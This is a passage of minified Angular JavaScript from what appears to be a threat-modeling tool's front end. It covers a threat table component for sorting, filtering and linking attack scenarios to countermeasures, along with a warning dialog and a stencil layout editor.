c=e.filter(d=>[_o.NotApplicable,_o.Duplicate].includes(d.ThreatState));c.sort((d,T)=>Number(d.Number)<Number(T.Number)?-1:1),this.dataSourceNA=new zd(c),this.dataSourceNA.sort=this.sort,this.dataSourceNA.sortingDataAccessor=i,this.dataSourceNA.filterPredicate=n,this.sort&&this.sort.sortChange.emit(this.sort)}get selectedThreat(){return this._selectedThreat}set selectedThreat(e){this._selectedThreat=e}get selectedNode(){return this._selectedNode}set selectedNode(e){var i;this._selectedNode=e,this.displayedColumns=["state","number","type","name","vector","target"],(null===(i=this._selectedNode)||void 0===i?void 0:i.data)instanceof Vg&&this.displayedColumns.push("elements"),this.displayedColumns.push("countermeasures","status","more"),this.RefreshThreats()}get selectedObject(){return this._selectedObject}set selectedObject(e){var i;e&&(null===(i=this._selectedObject)||void 0===i?void 0:i.ID)==e.ID||(this._selectedObject=e)}set filteredObject(e){this._filteredObject=e,this.RefreshThreats()}ngOnInit(){}onKeyDown(e){var i;if(this.isActive&&"TEXTAREA"!=(null===(i=document.activeElement)||void 0===i?void 0:i.tagName)){if(this.selectedThreat){const n=(r,c)=>{this.SelectThreat(r[c]);const d=this.rows.find(T=>T.nativeElement.id===r[c].ID);null==d||d.nativeElement.scrollIntoView({block:"center",behavior:"smooth"})};if("ArrowDown"==e.key){const r=this.dataSourceActive.sortData(this.dataSourceActive.filteredData,this.sort),c=r.indexOf(this.selectedThreat);c<r.length-1&&n(r,c+1)}else if("ArrowUp"==e.key){const r=this.dataSourceActive.sortData(this.dataSourceActive.filteredData,this.sort),c=r.indexOf(this.selectedThreat);c>0&&n(r,c-1)}}["ArrowDown","ArrowUp"].includes(e.key)&&(e.preventDefault(),e.stopImmediatePropagation())}}RefreshThreats(){setTimeout(()=>{var e,i,n;this.AttackScenarios=[],!(null===(e=this._selectedNode)||void 0===e)&&e.data&&((null===(i=this._selectedNode)||void 0===i?void 0:i.data)instanceof ns?this.AttackScenarios=this.threatEngine.GenerateDiagramThreats(this._selectedNode.data):(null===(n=this._selectedNode)||void 0===n?void 0:n.data)instanceof Om&&(this.AttackScenarios=this.threatEngine.GenerateStackThreats(this._selectedNode.data))),this.threatCountChanged.emit(this.dataSourceActive.data.length),this.countermeasureCounts={},this.isCalculatingThreats=!1},10)}OnMappingDblClick(e,i){i&&i.target&&"countermeasures"==this.displayedColumns[i.target.cellIndex]&&this.dataService.Project.GetCountermeasures().filter(n=>n.AttackScenarios.includes(e)).length>0?this.OnViewCountermeasures(e):this.dialog.OpenAttackScenarioDialog(e,!1,[...this.dataSourceActive.sortData(this.dataSourceActive.filteredData,this.sort),...this.dataSourceNA.sortData(this.dataSourceNA.filteredData,this.sort)])}ApplyFilter(e){const i=e.target.value;this.dataSourceActive.filter=i.trim().toLowerCase(),this.dataSourceNA.filter=i.trim().toLowerCase()}IsThreatSelected(e){return this.selectedThreat==e}IsThreatRemoved(e){return e.MappingState==zn.Removed}IsThreatNotApplying(e){return[_o.NotApplicable,_o.Duplicate].includes(e.ThreatState)}SelectThreat(e){this.selectedThreat=e,e.Target&&this.selectedObjectChanged.emit(e.Target)}IsElementSelected(e){return e&&this.selectedObject&&(e.Target==this.selectedObject||e.Targets.includes(this.selectedObject))}GetFilteredCountermeasures(e){return this.dataService.Project.GetCountermeasuresApplicable().filter(i=>i.Name.toLowerCase().includes(this.searchCMString.toLowerCase())&&!i.AttackScenarios.includes(e))}GetCountermeasureGroups(e){if(null==this.countermeasureGroups){this.countermeasureGroups=[];const i=this.dataService.Project.GetCountermeasuresApplicable().filter(n=>!e.GetCountermeasures().includes(n)).reduce((n,r)=>Object.assign(Object.assign({},n),{[r.ViewID]:[...n[r.ViewID]||[],r]}),{});Object.keys(i).forEach(n=>{var r;this.countermeasureGroups.push({name:null===(r=this.dataService.Project.GetView(n))||void 0===r?void 0:r.Name,countermeasures:i[n]})}),this.countermeasureGroups.forEach(n=>n.countermeasures.sort((r,c)=>r.MitigationState>c.MitigationState?-1:r.MitigationState==c.MitigationState?0:1))}return this.countermeasureGroups}AddCountermeasure(e){const i=this.dataService.Project.CreateCountermeasure(this.selectedNode.data.ID,!1);i.SetMapping(null,e.Targets,[e]);let n=[];this.selectedNode.data instanceof ns?n=this.selectedNode.data.Elements.GetChildrenFlat():this.selectedNode.data instanceof Om&&(n=this.selectedNode.data.GetChildrenFlat()),this.dialog.OpenCountermeasureDialog(i,!0,n).subscribe(r=>{r||this.dataService.Project.DeleteCountermeasure(i),this.countermeasureCounts[e.ID]=null})}AddExistingCountermeasure(e,i){i.AddAttackScenario(e),this.countermeasureCounts[e.ID]=null,e.Target&&i.AddTarget(e.Target)}OnViewCountermeasures(e){this.dataService.Project.GetCountermeasures().filter(i=>i.AttackScenarios.includes(e)).forEach(i=>{this.dialog.OpenCountermeasureDialog(i,!1,null)})}OnDeleteMapping(e){this.dataService.Project.DeleteAttackScenario(e),this.RefreshThreats()}ResetNumbers(){const e=this.dataService.Project.GetAttackScenarios().sort((i,n)=>Number(i.Number)-Number(n.Number));for(let i=0;i<e.length;i++)e[i].Number=(i+1).toString()}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}GetStateIcon(e){return e.MappingState==zn.New?"add":e.MappingState==zn.Removed?"remove":""}GetCreationTypeIcon(e){return e.IsGenerated?"settings_suggest":"handyman"}GetCreationTypeIconTooltip(e){return e.IsGenerated?"general.Generated":"general.Manual"}GetThreatCategories(e){return e.ThreatCategories.map(i=>i.Name).join(", ")}GetTargets(e){return e.Targets.map(i=>i.GetProperty("Name")).join(", ")}GetCountermeasures(e){if(null==this.countermeasureCounts[e.ID]){const i=this.dataService.Project.GetCountermeasuresApplicable().filter(n=>n.AttackScenarios.includes(e)).length;this.countermeasureCounts[e.ID]=0==i?this.translate.instant("pages.modeling.threattable.noCountermeasure"):i.toString()+" "+this.translate.instant("pages.modeling.threattable.countermeasures")}return this.countermeasureCounts[e.ID]}GetApplicableCount(){return Gi.Format(this.translate.instant("pages.modeling.threattable.applicable"),this.dataSourceActive.data.length.toString(),this.AttackScenarios.length.toString())}GetThreatStates(){return ku.GetThreatStates()}GetThreatStateName(e){return ku.ToString(e)}OnSearchCMBoxClick(){var e,i,n;null===(n=null===(i=null===(e=this.searchCMBox)||void 0===e?void 0:e._elementRef)||void 0===i?void 0:i.nativeElement)||void 0===n||n.focus()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(RT),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-table"]],viewQuery:function(e,i){if(1&e&&(Mi(po,5),Mi(al,5),Mi(emt,5),Mi(xc,5,mi)),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first),Vt(n=Bt())&&(i.sort=n.first),Vt(n=Bt())&&(i.searchCMBox=n.first),Vt(n=Bt())&&(i.rows=n)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},inputs:{isActive:"isActive",selectedNode:"selectedNode",selectedObject:"selectedObject",filteredObject:"filteredObject"},outputs:{selectedObjectChanged:"selectedObjectChanged",threatCountChanged:"threatCountChanged"},decls:221,vars:38,consts:[[2,"height","100%","display","grid","align-content","start"],[1,"tools"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"matTooltip","click"],["matInput","",1,"filterInput",3,"placeholder","keyup"],["style","display: inline; vertical-align: super; margin-left: 5px;","mode","indeterminate",3,"diameter",4,"ngIf"],["style","float: right; padding-top: 5px;",4,"ngIf"],[2,"overflow","auto"],["mat-table","","matSort","","matSortActive","state","matSortDirection","asc","matSortDisableClear","",2,"width","100%",3,"dataSource"],["matColumnDef","state"],["mat-header-cell","","mat-sort-header","","style","width: 34px;",4,"matHeaderCellDef"],["mat-cell","",4,"matCellDef"],["matColumnDef","number"],["mat-header-cell","","mat-sort-header","",4,"matHeaderCellDef"],["matColumnDef","name"],["matColumnDef","type"],["matColumnDef","vector"],["matColumnDef","categories"],["matColumnDef","target"],["mat-cell","",3,"selected-cell",4,"matCellDef"],["matColumnDef","rule"],["matColumnDef","elements"],["matColumnDef","countermeasures"],["mat-header-cell","",4,"matHeaderCellDef"],["matColumnDef","status"],["matColumnDef","more"],["mat-header-row","","style","height: 30px;",4,"matHeaderRowDef","matHeaderRowDefSticky"],["mat-row","",3,"id","selected-item","removed-item","click","dblclick","contextmenu",4,"matRowDef","matRowDefColumns"],["class","mat-row",4,"matNoDataRow"],["mat-row","",3,"selected-item","removed-item","click","dblclick","contextmenu",4,"matRowDef","matRowDefColumns"],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["rightMenu","matMenu"],["matMenuContent",""],["mode","indeterminate",2,"display","inline","vertical-align","super","margin-left","5px",3,"diameter"],[2,"float","right","padding-top","5px"],["mat-header-cell","","mat-sort-header","",2,"width","34px"],["mat-cell",""],["mat-header-cell","","mat-sort-header",""],["matBadgeColor","warn","matBadgeSize","small","matBadgePosition","below",3,"matBadge","matBadgeHidden","matTooltip"],[4,"ngIf"],["mat-header-cell",""],[2,"width","140px",3,"ngModel","ngModelChange"],[3,"value",4,"ngFor","ngForOf"],[3,"value"],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-header-row","",2,"height","30px"],["mat-row","",3,"id","click","dblclick","contextmenu"],[1,"mat-row"],["colspan","9",1,"mat-cell",3,"contextmenu"],["mat-row","",3,"click","dblclick","contextmenu"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"disabled","click"],["mat-menu-item","",3,"disabled","matMenuTriggerFor"],["addMenu","matMenu"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"matMenuTriggerFor"],["existingMenu","matMenu"],["mat-menu-item","",3,"ngModel","matMenuTriggerFor","placeholder","ngModelChange","click"],["searchCMBox",""],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData",4,"ngFor","ngForOf"],["countermeasureList","matMenu"],["filteredCountermeasureList","matMenu"],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngFor","ngForOf"],[2,"margin-left","20px","margin-right","20px"],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData"],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click"]],template:function(e,i){if(1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"div",1),s(3,"\n    "),m(4,"button",2),he("click",function(){return i.RefreshThreats()}),oe(5,"translate"),s(6,"\n      "),m(7,"mat-icon"),s(8,"refresh"),u(),s(9,"\n    "),u(),s(10,"\n    "),m(11,"button",2),he("click",function(){return i.autoRefreshThreats=!i.autoRefreshThreats}),oe(12,"translate"),s(13,"\n      "),m(14,"mat-icon"),s(15,"autorenew"),u(),s(16,"\n    "),u(),s(17,"\n    "),m(18,"input",3),he("keyup",function(r){return i.ApplyFilter(r)}),oe(19,"translate"),u(),s(20,"\n    "),ne(21,tmt,1,1,"mat-progress-spinner",4),s(22,"\n    "),ne(23,imt,2,1,"span",5),s(24,"\n  "),u(),s(25,"\n  "),m(26,"div",6),s(27,"\n    "),s(28,"\n    "),m(29,"table",7),s(30,"\n      "),bt(31,8),s(32,"\n        "),ne(33,amt,2,0,"th",9),s(34,"\n        "),ne(35,nmt,5,1,"td",10),s(36,"\n      "),Mt(),s(37,"\n      "),bt(38,11),s(39,"\n        "),ne(40,omt,3,3,"th",12),s(41,"\n        "),ne(42,rmt,2,1,"td",10),s(43,"\n      "),Mt(),s(44,"\n      "),bt(45,13),s(46,"\n        "),ne(47,smt,3,3,"th",12),s(48,"\n        "),ne(49,cmt,2,1,"td",10),s(50,"\n      "),Mt(),s(51,"\n      "),bt(52,14),s(53,"\n        "),ne(54,lmt,2,0,"th",12),s(55,"\n        "),ne(56,dmt,6,6,"td",10),s(57,"\n      "),Mt(),s(58,"\n      "),bt(59,15),s(60,"\n        "),ne(61,mmt,3,3,"th",12),s(62,"\n        "),ne(63,umt,2,1,"td",10),s(64,"\n      "),Mt(),s(65,"\n      "),bt(66,16),s(67,"\n        "),ne(68,hmt,3,3,"th",12),s(69,"\n        "),ne(70,fmt,2,1,"td",10),s(71,"\n      "),Mt(),s(72,"\n      "),bt(73,17),s(74,"\n        "),ne(75,pmt,3,3,"th",12),s(76,"\n        "),ne(77,_mt,2,3,"td",18),s(78,"\n      "),Mt(),s(79,"\n      "),bt(80,19),s(81,"\n        "),ne(82,gmt,3,3,"th",12),s(83,"\n        "),ne(84,ymt,3,1,"td",10),s(85,"\n      "),Mt(),s(86,"\n      "),bt(87,20),s(88,"\n        "),ne(89,bmt,3,3,"th",12),s(90,"\n        "),ne(91,Mmt,2,3,"td",18),s(92,"\n      "),Mt(),s(93,"\n      "),bt(94,21),s(95,"\n        "),ne(96,vmt,3,3,"th",22),s(97,"\n        "),ne(98,Amt,2,1,"td",10),s(99,"\n      "),Mt(),s(100,"\n      "),bt(101,23),s(102,"\n        "),ne(103,Tmt,3,3,"th",12),s(104,"\n        "),ne(105,Dmt,7,2,"td",10),s(106,"\n      "),Mt(),s(107,"\n      "),bt(108,24),s(109,"\n        "),ne(110,xmt,2,0,"th",22),s(111,"\n        "),ne(112,wmt,6,3,"td",10),s(113,"\n      "),Mt(),s(114,"\n  \n      "),ne(115,Imt,1,0,"tr",25),s(116,"\n      "),ne(117,Rmt,2,5,"tr",26),s(118,"\n      "),ne(119,Smt,6,3,"tr",27),s(120,"\n    "),u(),s(121,"\n\n    "),s(122,"\n    "),m(123,"table",7),s(124,"\n      "),bt(125,8),s(126,"\n        "),ne(127,kmt,2,0,"th",9),s(128,"\n        "),ne(129,Pmt,5,1,"td",10),s(130,"\n      "),Mt(),s(131,"\n      "),bt(132,11),s(133,"\n        "),ne(134,Omt,3,3,"th",12),s(135,"\n        "),ne(136,Nmt,2,1,"td",10),s(137,"\n      "),Mt(),s(138,"\n      "),bt(139,13),s(140,"\n        "),ne(141,Lmt,3,3,"th",12),s(142,"\n        "),ne(143,zmt,2,1,"td",10),s(144,"\n      "),Mt(),s(145,"\n      "),bt(146,14),s(147,"\n        "),ne(148,Wmt,2,0,"th",12),s(149,"\n        "),ne(150,Fmt,6,6,"td",10),s(151,"\n      "),Mt(),s(152,"\n      "),bt(153,15),s(154,"\n        "),ne(155,Vmt,3,3,"th",12),s(156,"\n        "),ne(157,Bmt,2,1,"td",10),s(158,"\n      "),Mt(),s(159,"\n      "),bt(160,16),s(161,"\n        "),ne(162,Hmt,3,3,"th",12),s(163,"\n        "),ne(164,Umt,2,1,"td",10),s(165,"\n      "),Mt(),s(166,"\n      "),bt(167,17),s(168,"\n        "),ne(169,qmt,3,3,"th",12),s(170,"\n        "),ne(171,Gmt,2,3,"td",18),s(172,"\n      "),Mt(),s(173,"\n      "),bt(174,19),s(175,"\n        "),ne(176,jmt,3,3,"th",12),s(177,"\n        "),ne(178,$mt,3,1,"td",10),s(179,"\n      "),Mt(),s(180,"\n      "),bt(181,20),s(182,"\n        "),ne(183,Kmt,3,3,"th",12),s(184,"\n        "),ne(185,Xmt,2,3,"td",18),s(186,"\n      "),Mt(),s(187,"\n      "),bt(188,21),s(189,"\n        "),ne(190,Ymt,3,3,"th",22),s(191,"\n        "),ne(192,Jmt,2,1,"td",10),s(193,"\n      "),Mt(),s(194,"\n      "),bt(195,23),s(196,"\n        "),ne(197,Zmt,3,3,"th",12),s(198,"\n        "),ne(199,tut,7,2,"td",10),s(200,"\n      "),Mt(),s(201,"\n      "),bt(202,24),s(203,"\n        "),ne(204,iut,2,0,"th",22),s(205,"\n        "),ne(206,aut,6,3,"td",10),s(207,"\n      "),Mt(),s(208,"\n  \n      "),ne(209,nut,2,4,"tr",28),s(210,"\n    "),u(),s(211,"\n  "),u(),s(212,"\n  "),it(213,"div",29),s(214," \n  "),m(215,"mat-menu",null,30),s(217," \n    "),ne(218,uut,89,36,"ng-template",31),s(219," \n  "),u(),s(220," \n"),u()),2&e){const n=Ti(216);C(4),at("matTooltip",re(5,32,"general.Refresh")),C(7),Ct("toolBtn-Selected",i.autoRefreshThreats),at("matTooltip",re(12,34,"pages.modeling.threattable.autoRefresh")),C(7),ri("color",i.theme.IsDarkMode?"white":"black"),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),at("placeholder",re(19,36,"pages.modeling.filter")),C(3),V("ngIf",i.refreshingThreats),C(2),V("ngIf",i.AttackScenarios.length>0),C(6),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("dataSource",i.dataSourceActive),C(86),V("matHeaderRowDef",i.displayedColumns)("matHeaderRowDefSticky",!0),C(2),V("matRowDefColumns",i.displayedColumns),C(6),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("dataSource",i.dataSourceNA),C(86),V("matRowDefColumns",i.displayedColumns),C(4),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,pm,_m,an,Ed,Ta,Ea,oa,Hh,da,Xa,xl,Xo,qo,po,el,Pa,Au,Tu,jh,xm,Dm,Du,Eu,wm,Qh,xc,Cp,al,bp,Xi],styles:[".primary-color[_ngcontent-%COMP%], .selected-cell[_ngcontent-%COMP%], .selected-item[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}th[_ngcontent-%COMP%], td[_ngcontent-%COMP%]{font-size:small}tr[_ngcontent-%COMP%]{height:30px!important}th.mat-header-cell[_ngcontent-%COMP%]:first-of-type, td.mat-cell[_ngcontent-%COMP%]:first-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:first-of-type{padding-left:5px!important}th.mat-header-cell[_ngcontent-%COMP%]:last-of-type, td.mat-cell[_ngcontent-%COMP%]:last-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:last-of-type{padding-right:5px!important}.removed-item[_ngcontent-%COMP%]{opacity:.3}.tools[_ngcontent-%COMP%]{display:block;float:left;height:27px;width:calc(100% - 20px);font-size:12px}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}.toolBtn-Selected[_ngcontent-%COMP%]{background-color:#ffffff26}.filterInput[_ngcontent-%COMP%]{margin-left:5px;width:200px;height:25px}.disable[_ngcontent-%COMP%]{pointer-events:none}"]}),t})(),fut=(()=>{class t{constructor(e){this.data=e}ngOnInit(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(_p))},t.\u0275cmp=Wt({type:t,selectors:[["app-warning-dialog"]],decls:27,vars:19,consts:[["mat-dialog-title",""],["color","primary",3,"ngModel","ngModelChange"],["align","end"],["mat-button","",3,"disabled","mat-dialog-close"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1),oe(2,"translate"),u(),s(3,"\n"),m(4,"mat-dialog-content"),s(5,"\n  "),m(6,"p"),s(7),oe(8,"translate"),u(),s(9,"\n  "),m(10,"p")(11,"mat-checkbox",1),he("ngModelChange",function(r){return i.data.consent=r}),s(12),oe(13,"translate"),u()(),s(14,"\n  "),m(15,"p")(16,"mat-checkbox",1),he("ngModelChange",function(r){return i.data.remember=r}),s(17),oe(18,"translate"),u()(),s(19,"\n"),u(),s(20,"\n"),m(21,"mat-dialog-actions",2),s(22,"\n  "),m(23,"button",3),s(24),oe(25,"translate"),u(),s(26,"\n"),u()),2&e&&(C(1),ke(re(2,9,"general.Warning")),C(6),ke(re(8,11,"dialog.warning.changeConfig")),C(4),V("ngModel",i.data.consent),C(1),ke(re(13,13,"dialog.warning.consent")),C(4),V("ngModel",i.data.remember),C(1),ke(re(18,15,"dialog.warning.rememberForToday")),C(6),V("disabled",!i.data.consent)("mat-dialog-close",!0),C(1),ke(re(25,17,"general.OK")))},dependencies:[Ta,Ea,br,da,vm,Am,Tm,Em,Xi]}),t})();function put(t,a){if(1&t&&(m(0,"mat-option",8),s(1),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(i.GetElementTypeName(e))}}function _ut(t,a){if(1&t&&(m(0,"mat-option",8),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(e.GetProperty("Name"))}}function gut(t,a){if(1&t&&(m(0,"mat-form-field",11),s(1,"\n      "),m(2,"mat-label"),s(3,"Width"),u(),s(4,"\n      "),it(5,"input",12),s(6,"\n    "),u()),2&t){const e=B().index,i=B(2);C(5),V("ngModel",i.selectedTypeTemplate.Layout[e].width)}}function Cut(t,a){if(1&t&&(m(0,"mat-form-field",11),s(1,"\n      "),m(2,"mat-label"),s(3,"Height"),u(),s(4,"\n      "),it(5,"input",12),s(6,"\n    "),u()),2&t){const e=B().index,i=B(2);C(5),V("ngModel",i.selectedTypeTemplate.Layout[e].height)}}function yut(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n    "),m(2,"mat-form-field",9),s(3,"\n      "),m(4,"mat-label"),s(5),u(),s(6,"\n      "),m(7,"input",10),he("ngModelChange",function(n){const c=be(e).index;return Me(B(2).selectedTypeTemplate.Layout[c].name=n)}),u(),s(8,"\n    "),u(),s(9,"\n    "),m(10,"mat-form-field",11),s(11,"\n      "),m(12,"mat-label"),s(13,"X"),u(),s(14,"\n      "),it(15,"input",12),s(16,"\n    "),u(),s(17,"\n    "),m(18,"mat-form-field",11),s(19,"\n      "),m(20,"mat-label"),s(21,"Y"),u(),s(22,"\n      "),it(23,"input",12),s(24,"\n    "),u(),s(25,"\n    "),ne(26,gut,7,1,"mat-form-field",13),s(27,"\n    "),ne(28,Cut,7,1,"mat-form-field",13),s(29,"\n  "),u()}if(2&t){const e=a.$implicit,i=a.index,n=B(2);C(5),ke(e.GetProperty("Name")),C(2),V("spellcheck",n.dataService.HasSpellCheck)("ngModel",n.selectedTypeTemplate.Layout[i].name),C(8),V("ngModel",n.selectedTypeTemplate.Layout[i].x),C(8),V("ngModel",n.selectedTypeTemplate.Layout[i].y),C(3),V("ngIf",n.selectedTypeTemplate.Layout[i].canEditSize),C(2),V("ngIf",n.selectedTypeTemplate.Layout[i].canEditSize)}}function but(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n  "),m(2,"mat-checkbox",1),he("ngModelChange",function(n){return be(e),Me(B().selectedTypeTemplate.ListInHWDiagram=n)}),s(3),oe(4,"translate"),u(),s(5,"\n  "),it(6,"br"),s(7,"\n  "),m(8,"mat-checkbox",1),he("ngModelChange",function(n){return be(e),Me(B().selectedTypeTemplate.ListInUCDiagram=n)}),s(9),oe(10,"translate"),u(),s(11,"\n  "),it(12,"br"),s(13,"\n  "),m(14,"mat-form-field",2),s(15,"\n    "),m(16,"mat-label"),s(17),oe(18,"translate"),u(),s(19,"\n    "),m(20,"mat-select",3),he("valueChange",function(n){return be(e),Me(B().selectedTypeTemplate.ListInElementTypeIDs=n)}),s(21,"\n      "),ne(22,put,2,2,"mat-option",4),s(23,"\n    "),u(),s(24,"\n  "),u(),s(25,"\n  "),m(26,"mat-form-field",5),s(27,"\n    "),m(28,"mat-label"),s(29),oe(30,"translate"),u(),s(31,"\n    "),m(32,"mat-select",3),he("valueChange",function(n){return be(e),Me(B().selectedTypeTemplate.StencilTypes=n)}),s(33,"\n      "),ne(34,_ut,2,2,"mat-option",4),s(35,"\n    "),u(),s(36,"\n  "),u(),s(37),oe(38,"translate"),m(39,"button",6),he("click",function(){return be(e),Me(B().AutoCalcLayout())}),oe(40,"translate"),m(41,"mat-icon"),s(42,"auto_fix_high"),u()(),s(43,"\n  "),it(44,"br"),s(45,"\n  "),ne(46,yut,30,7,"div",7),s(47,"\n"),Mt()}if(2&t){const e=B();C(2),V("disabled",!e.selectedTypeTemplate.CanEditInWhichDiagram)("ngModel",e.selectedTypeTemplate.ListInHWDiagram),C(1),ke(re(4,15,"properties.ListInHWDiagram")),C(5),V("disabled",!e.selectedTypeTemplate.CanEditInWhichDiagram)("ngModel",e.selectedTypeTemplate.ListInUCDiagram),C(1),ke(re(10,17,"properties.ListInUCDiagram")),C(8),ke(re(18,19,"properties.ListInElementTypeIDs")),C(3),V("value",e.selectedTypeTemplate.ListInElementTypeIDs),C(2),V("ngForOf",e.GetElementTypes()),C(7),ke(re(30,21,"properties.StencilTypes")),C(3),V("value",e.selectedTypeTemplate.StencilTypes),C(2),V("ngForOf",e.GetStencilTypes()),C(3),ct("\n  ",re(38,23,"properties.Layout")," "),C(2),at("matTooltip",re(40,25,"pages.config.stencils.calcLayout")),C(7),V("ngForOf",e.selectedTypeTemplate.StencilTypes)}}let Mut=(()=>{class t{constructor(e){this.dataService=e}ngOnInit(){}GetElementTypes(){let e=[];return this.selectedTypeTemplate.ListInHWDiagram&&e.push(Et.PhyProcessing,Et.PhyDataStore,Et.PhyExternalEntity,Et.PhyTrustArea,Et.PhysicalLink,Et.Interface),this.selectedTypeTemplate.ListInUCDiagram&&e.push(Et.LogProcessing,Et.LogDataStore,Et.LogExternalEntity,Et.PhyExternalEntity,Et.LogTrustArea,Et.PhyTrustArea,Et.PhysicalLink),e}GetElementTypeName(e){return Sc.ToString(e)}GetStencilTypes(){let e=this.dataService.Config.GetStencilTypes();return e.sort((i,n)=>n.IsDefault?1:i.ElementTypeID-n.ElementTypeID),e}AutoCalcLayout(){var e,Fe;if(this.selectedTypeTemplate&&(null===(e=this.selectedTypeTemplate.StencilTypes)||void 0===e?void 0:e.length)>0){let i=this.selectedTypeTemplate.StencilTypes,n=this.selectedTypeTemplate.Layout,r=i.filter(Fe=>Fe.ElementTypeID!=Et.PhyTrustArea&&Fe.ElementTypeID!=Et.LogTrustArea),d=(Fe,Ne)=>Math.ceil(Fe/Ne);const T=20,k=40,q=20,Y=140,te=75;let pe=(Fe=r.length)<=4?2:Fe<=9?3:4,Re=d(r.length,pe);for(let Fe=0,Ne=0,et=0;Fe<i.length;Fe++)i[Fe].ElementTypeID!=Et.PhyTrustArea&&i[Fe].ElementTypeID!=Et.LogTrustArea?(n[Fe].x=T+et*(Y+q),n[Fe].y=k+Ne*(te+q),et++,et==pe&&(et=0,Ne++)):(n[Fe].x=n[Fe].y=0,n[Fe].width=2*T+pe*Y+(pe-1)*q,n[Fe].height=2*k+Re*te+(Re-1)*q)}}}return t.\u0275fac=function(e){return 